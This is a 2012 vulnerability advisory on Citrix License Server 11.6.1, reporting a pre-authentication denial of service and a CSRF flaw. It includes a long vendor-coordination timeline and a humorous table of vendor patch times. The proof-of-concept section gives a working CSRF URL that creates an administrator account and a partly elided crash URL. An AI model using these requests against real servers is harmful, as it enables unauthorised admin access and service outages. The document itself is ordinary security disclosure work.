nSense Vulnerability Research Security Advisory NSENSE-2012-001
      ---------------------------------------------------------------

      Affected Vendor:    Citrix
      Affected Product:   Citrix License Server 11.6.1 build 10007
      Impact:             DoS, CSRF
      Vendor response:    New version released
      CVE:                N/A
      Credit:             Rune & Knud aka Smurfbuddies / nSense
      Release date:       15 Mar 2012
      Vendor link:        http://support.citrix.com/article/CTX128167

      Technical details
      ---------------------------------------------------------------

      The license server web management interface contains two
      vulnerabilities:
      1) Denial-of-Service vulnerability which allows an
         unauthenticated attacker to crash the license server.

      2) Cross Site Request Forgery vulnerability which enables an
         attacker to create additional users in the management
         interface, IF a logged-in administrator can be lured to
         visit a link pointing to the vulnerable functionality.

      Timeline:
      2010-12-20 Sent an e-mail to secure@citrix.com with
                 vulnerability details
      2010-12-20 Citrix acknowledged the submission and opened a case
      2011-01-31 Requested a status update
      2011-01-31 Citrix replied, stated vulnerabilities are in a
                 third party component
      2011-01-31 Requested more detailed information about the patch
                 schedule
      2011-02-14 Requested a status update
      2011-02-14 Citrix replied
      2011-02-16 Requested more detailed information to justify
                 deadline extension
      2011-02-17 Citrix replied
      2011-02-17 Requested information about the bulletin
      2011-02-17 Citrix replied
      2011-02-23 Citrix delivered bulletin information
      2011-02-23 Requested information regarding the bulletin
      2011-02-23 Citrix replied
      2011-02-24 Supplied Citrix information about nSense disclosure
                 policy
      2011-03-20 Requested information about the patch schedule
      2011-03-29 Requested a status update
      2011-03-30 Enquired whether e-mails had been received
      2011-03-30 Received an e-mail bounce 550 5.2.0 STOREDRV from
                 support@citrix.com
      2011-03-31 Citrix replied
      2011-03-31 Acknowledged continuing coordination
      2011-04-19 Requested a status update
      2011-05-25 Requested a status update
      2011-06-15 Requested a status update
      2011-06-16 Citrix replied
      2011-07-17 Requested a status update
      2011-08-17 Requested a status update
      2011-08-17 Citrix replied
      2011-10-12 Requested a status update
      2011-10-21 Requested a status update
      2011-10-21 Citrix replied. Still validating patches,
                 still no release date set
      2011-11-18 Requested a status update. Sent timeline to
                 Citrix
      2011-12-05 Citrix replied. Targeting February 2012.
                 Citrix promised to send new information if
                 the planned schedule changes
      2012-02-29 February 2012 officially over. No news
                 from Citrix
      2012-03-02 Citrix informed they are preparing a release
      2012-03-05 Replied and specified credit information
      2012-03-13 Citrix replied. Sent knowledge base link
      2012-03-15 Advisory released. Old nSense vulnerability
                 coordination policy officially terminated.

      Proof-of-Concept:
      http://citrix-license-server-ip:8082/users?licenseTab=&selected
      =&userName=xsrf&firstName=xsrf&lastName=xsrf&password2=xsrf&con
      firm=xsrf&accountType=admin&originalAccountType=&Create=Save
      (Administrator CSRF)

      http://citrix-license-server-ip:8082/dashboard?
      <something long here>=2 (pre auth DoS, crashes lmadmin.exe)

      Note! The lmadmin crash was _not_ analyzed in any way.

      Additional information
      ----------------------
      As our current vulnerability coordination policy has come to
      an end, we wanted to share with you some of the lap times from
      vendors who have gone through our test track.

      Vendor with a reasonably-priced vulnerability

      Leaderboard
      -----------
      VeryPDF: 1 week
      Nullsoft: 2 weeks
      Adobe: 2 months
      Cisco: 2.5 months
      SAP: 2.5 months
      Adobe: 3 months
      Teamspeak: 3 months / no patch (CERT-FI)
      Azeotech: 3.5 months (ICS-CERT)
      Angelina Jolie*: 5 months (ICS-CERT)
      Apple: 6 months
      Novell: 8 months
      Citrix: 15 months
                                   * Bill Bailey, or was it Scadatec?

      And on this bombshell, it is time to end. Good night!
      ---------------------------------------------------------------
      http://www.nsense.dk http://www.nsense.fi http://www.nsense.pl